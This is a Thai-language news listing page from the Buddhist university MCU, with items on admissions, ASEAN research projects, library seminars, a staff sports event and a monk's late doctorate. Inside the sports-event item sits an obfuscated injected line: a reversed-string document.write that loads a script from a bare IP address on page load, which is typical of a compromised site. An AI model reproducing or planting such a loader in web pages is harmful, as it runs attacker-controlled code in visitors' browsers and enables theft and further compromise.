รับสมัครนิสิต วิทยาลัยสงฆ์พุทธชินราช มจร รับสมัครนิสิต วิทยาลัยสงฆ์พุทธชินราช มจร

                วิทยาลัยสงฆ์พุทธชินราช มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย จัดการศึกษาพระพุทธศาสนา บูรณาการกับศาสตร์สมัยใหม่ พัฒนาจิตใจและสังคม รับสมัครนิสิตใหม่ประจำปีการศึกษา ๒๕๕๙ รับพระภิกษุและประชาชนทั่วไป *** รับสมัครตั้งแต่บัดนี้ถึง ๒๓ พฤษภาคม ๒๕๕๙ สอบถามรายละเอียดเพิ่มเติม วิทยาลัยสงฆ์พุทธชินราช ต.บึงพระ อ.เมือง จ.พิษณุโลก โทร. ๐๙๙-๒๙๑-๑๐๕๘, ๐๙๙-๒๙๑-๐๗๙๙ หรือ...

โครงการพัฒนาศักยภาพ การวิจัยทางพระพุทธศาสนาเพื่อความก้าวหน้าในประชาคมอาเซียน โครงการพัฒนาศักยภาพ การวิจัยทางพระพุทธศาสนาเพื่อความก้าวหน้าในประชาคมอาเซียน

                        โครงการพัฒนาศักยภาพ การวิจัยทางพระพุทธศาสนาเพื่อความก้าวหน้าในประชาคมอาเซียน จัดโดย ศูนย์อาเซียนศึกษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ประจำปีงบประมาณ ๒๕๕๘ ( สำหรับวิทยาเขต และวิทยาลัยสงฆ์ เท่านั้น ) โดยมี พระราชวรเมธี,ดร. ผู้อำนวยการศูนย์อาเซียนศึกษา รองอธิการบดีฝ่ายบริหาร มจร เป็นประธานกล่าวเปิดงานและให้โอวาทแก่ผู้เข้าร่วมประชุม ระยะที่ ๑ ระหว่างวันที่ ๑๓ กรกฎาคม พ.ศ. ๒๕๕๘ เวลา...

อธิการ!มจร ตรวจเยี่ยม’พระบัณฑิตอาสาพัฒนาชาวเขา

อธิการบดี มจร ตรวจเยี่ยมชาวเขา เมื่อวันที่ ๒ มีนาคม ๒๕๕๘ พระพรหมบัณฑิต (ประยูร ธมฺมจิตฺโต) ศ.ดร. อธิการบดีมหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัยพร้อมผู้บริหาร เจ้าหน้าที่มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ได้เดินทางไปตรวจเยี่ยมพระบัณฑิตอาสาพัฒนาชาวเขา ของ มจร .พร้อมสนับสนุนทุนการศึกษาแก่เยาวชนในท้องที่ อำเภอกัลยานิวัฒนา จังหวัดเชียงใหม่ โดยมีพระราชสิงหวรมุนี รองอธิการบดี วิทยาเขตเชียงใหม่ คณาจารย์ และบุคลากร ให้การต้อนรับ ก่อนจะขึ้นไปสักการะพระบรมธาตุดอยสุเทพ ซึ่งพระธรรมเสนาบดี รองเจ้าคณะภาค ๗...

The last day of MCU Library Seminar 2015วันสุดท้าย และมอบวุฒิบัตรการสัมมนาห้องสมุด มจร ๕๘

การสัมมนาความร่วมมือระหว่างห้องสมุด และอบรมเชิงปฏิบัติการระบบห้องสมุดอัตโนมัติ สำหรับบรรณารักษ์/เจ้าหน้าที่ห้องสมุด มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ประจำปี ๒๕๕๘ ซึ่งจัดขึ้นในระหว่างวันที่ ๒๓ - ๒๕ เมษายน ๒๕๕๘ ที่ผ่านมา ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัยวิทยาเขตหนองคาย วันเสาร์ที่ ๒๕ เมษายน ๒๕๕๘ เป็นวันสุดท้าย ในเวลา ๐๘.๓๐...

MCU Library seminar for staffsห้องสมุดจัดสัมมนาความร่วมมือกันทั่วประเทศ

          การสัมมนาความร่วมมือระหว่างห้องสมุด และอบรมเชิงปฏิบัติการระบบห้องสมุดอัตโนมัติ สำหรับบรรณารักษ์/เจ้าหน้าที่ห้องสมุด มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ประจำปี ๒๕๕๘ ซึ่งจัดขึ้นระหว่างวันที่ ๒๓ - ๒๕ เมษายน ๒๕๕๘ ปีนี้จัดที่วิทยาเขตหนองคาย โดยในวันแรก วันที่ ๒๓ เมษายนมีกิจกรรม ดังต่อไปนี้ ในเวลา ๐๘.๐๐ น. พระราชรัตนาลงกรณ์, ดร. รองอธิการบดีวิทยาเขตหนองคาย...

MCU Library Seminar on second dayการสัมมนาห้องสมุด มจร วันที่สอง

การสัมมนาความร่วมมือระหว่างห้องสมุด และอบรมเชิงปฏิบัติการระบบห้องสมุดอัตโนมัติ สำหรับบรรณารักษ์/เจ้าหน้าที่ห้องสมุด มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ประจำปี ๒๕๕๘ ในวันที่ ๒๔ เมษายน ๒๕๕๘ เป็นวันที่ ๒ ซึ่งวันนี้เริ่มตั้งแต่เวลา ๐๘.๐๐ น. บรรณารักษ์/เจ้าหน้าที่ห้องสมุด นำโดย พระสิริชัยโสภณ ผู้อำนวยการส่วนหอสมุดกลาง ได้ออกเดินทางไปศึกษาดูงาน ณ ห้องสมุด NUOL Central Library มหาวิทยาลัยแห่งชาติลาว โดยได้รับเกียรติจากผู้อำนวยการห้องสมุดมหาวิทยาลัยแห่งชาติลาวกล่าวต้อนรับ และบรรณารักษ์ประจำห้องสมุดบรรยายพิเศษระบบห้องสมุดที่นั่น ...

Central Library organize the seminar and workshop training VTLS.ส่วนหอสมุดกลางจัดโครงการสัมมนาความร่วมมือระหว่างห้องสมุดและอบรมเชิงปฏิบัติการระบบห้องสมุดอัตโนมัติ

ส่วนหอสมุดกลาง สำนักหอสมุดและเทคโนโลยีสารสนเทศ จัดโครงการสัมมนาความร่วมมือระหว่างห้องสมุดและอบรมเชิงปฏิบัติการระบบห้องสมุดอัตโนมัติ สำหรับบรรณารักษ์/เจ้าหน้าที่ห้องสมุด มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ประจำปี ๒๕๕๘ ระหว่างวันที่ ๒๓-๒๕ เมษายน พ.ศ. ๒๕๕๘ ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วิทยาเขตหนองคาย ผู้เข้าร่วมโครงการสัมมนาฯ ประกอบด้วยผู้บริหาร บรรณารักษ์ และเจ้าหน้าที่ผู้ปฏิบัติงานห้องสมุดจากส่วนกลาง วิทยาเขต วิทยาลัยสงฆ์ ห้องเรียน และหน่วยวิทยบริการ รวมทั้งสิ้น ๔๒ แห่ง จำนวนผู้เข้าร่วมประมาณ ๗๐...

มจร หนองคาย เตรียมความพร้อมสู่ AEC

มจร หนองคาย เตรียมความพร้อมสู่ AEC           มจร หนองคาย จัดโครงการเตรียมความพร้อมเข้าสู่ประชาคมเศรษฐกิจอาเซียน ในวันเสาร์ที่ ๗ มีนาคม ๒๕๕๘ โดยมีท่านอโณทัย ธรรมกุล รองผู้ว่าราชการจังหวัดหนองคาย เป็นประธานในการกล่าวเปิดโครงการ โดยมีการบรรยายพิเศษ ร้อยตำรวจเอก ดร. นิติภูมิ นวรัตน์ ในโครงการเตรียมความพร้อมเข้าสู่ประชาคมเศรษฐกิจอาเซียน และ มีการเสวนาเปิดมุมมององค์กรพระพุทธศาสนากับการเตรียมความพร้อมเข้าสู่ประชาคมเศรษฐกิจอาเซียน" โดยผู้แทนจาก...

ขอเชิญบุคลากรเข้าร่วมโครงการส่งเสริมสุขภาพและศักยภาพการปฏิบัติงานของบุคลากร มจร. อโศกเกมส์ ครั้งที่ ๙

ขอเชิญบุคลากรเข้าร่วมโครงการส่งเสริมสุขภาพและศักยภาพการปฏิบัติงานของบุคลากร  มจร. อโศกเกมส์ ครั้งที่ ๙ ณ โรงเรียนวัดไร่ขิงวิทยา ตำบลไร่ขิง อ.สามพราน จ.นครปฐม ระหว่างวันที่ ๗-๙ พฤศจิกายน ๒๕๕๗ Download กำหนดการ Download แผนที่สถานที่แข่งขัน Download ตารางการแข่งขัน document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

พระที่เชียงใหม่ วัย 80 ปี-มุเรียนจนจบ ดร.ที่ มจร.

อดีตช่างกองทัพอากาศ ประจำกองบิน 2 โคกกะเทียม จ.ลพบุรี รับคำท้าเมียให้บวชพระตอนอายุ 68 ปี แต่ไม่ทิ้งการเรียน มุมานะ แม้ต้องเดินทางไกลจากเชียงใหม่ เข้ากรุงเทพฯทุกสัปดาห์ตลอด 3 ปีไม่เคยขาดเรียน จนจบปริญญาเอก มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย (มจร.) เมื่ออายุ 80 ปี เผย ตั้งใจจะนำความรู้มาพัฒนาวัดพันตอง จ.เชียงใหม่ และช่วยเหลือนักท่องเที่ยวชาวต่างชาติ เพราะพูดได้ทั้งภาษาอังกฤษ จีน และญี่ปุ่น ที่หอประชุม...

วิทยาลัยสงฆ์เลย มจร จัดพิธีไหว้ครู ต้อนรับนิสิตใหม่และพิธีมอบประกาศนียบัตรและวุฒิบัตร

เมื่อวันที่ 7 กรกฎาคม พ.ศ. 2562 มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วิทยาลัยสงฆ์เลย จัดพิธีไหว้ครู ต้อนรับนิสิตใหม่และพิธีมอบประกาศนียบัตรและวุฒิบัตร หลักสูตรประกาศนียบัตรการบริหารกิจการคณะสงฆ์ (ป.บส.), ร่วมแสดงความยินดีกับ รศ.ดร.ธงชัย สิงอุดม ที่ได้รับตำแหน่งทางวิชาการ ระดับ รองศาสตราจารย์ ทั้งนี้ยังได้รับความเมตตาจากนายเลิศศักดิ์ พัฒนชัยกุล ส.ส. จังหวัดเลย เขต 1 ได้มอบทุนการศึกษาแก่นิสิตของมหาวิทยาลัย การจัดพิธีไหว้ครู ต้อนรับนิสิตใหม่นั้นเพื่อแสดงถึงความเคารพและระลึกถึงอุปการคุณ แสดงออกซึ่งความกตัญญูกตเวทีต่อบูรพาจารย์...
X